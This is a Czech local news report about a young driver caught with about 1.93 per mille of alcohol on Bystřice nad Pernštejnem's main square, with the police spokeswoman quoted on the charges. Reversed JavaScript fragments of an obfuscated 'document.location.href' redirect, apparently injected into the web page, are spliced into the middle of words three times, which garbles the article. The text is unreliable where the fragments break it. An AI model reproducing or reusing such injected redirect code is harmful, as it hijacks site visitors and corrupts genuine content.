Rainbow page separator

Mladík projíždějící přes náměstí nadýchal skoro dvě promile

Neděle, 15. září 2019

Bystřice nad Pernštejnem / Až rok vězení hrozí dvacetiletému řidiči osobního au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu, který při policejní kontrole na bystřickém Masarykově náměstí nadýchal bezmála dvě promile alkoholu. Došlo k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu v neděli 8. září kolem druhé hodiny ráno.
„V rámci silniční kontroly policisté u muže provedli dechovou zkoušku, která byla pozitivní. Její naměřená hodnota činila 1,93 promile alkoholu. Hodnotu kolem dvou promile vykázala také obě opakovaná měření,“ informovala o události policejní mluvčí Stanislava Miláčková.
Další jízda byla ze strany policie mladému řidiči zakázána a současně na místě přišel o řidičský průkaz. „Byly zahájeny úkony trestního řízení pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. Za uvedenou trestnou činnost lze uložit trest odnětí svobody až na jeden rok a zákaz činnosti spočívající v zákazu řízení mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel,“ doplnila mluvčí.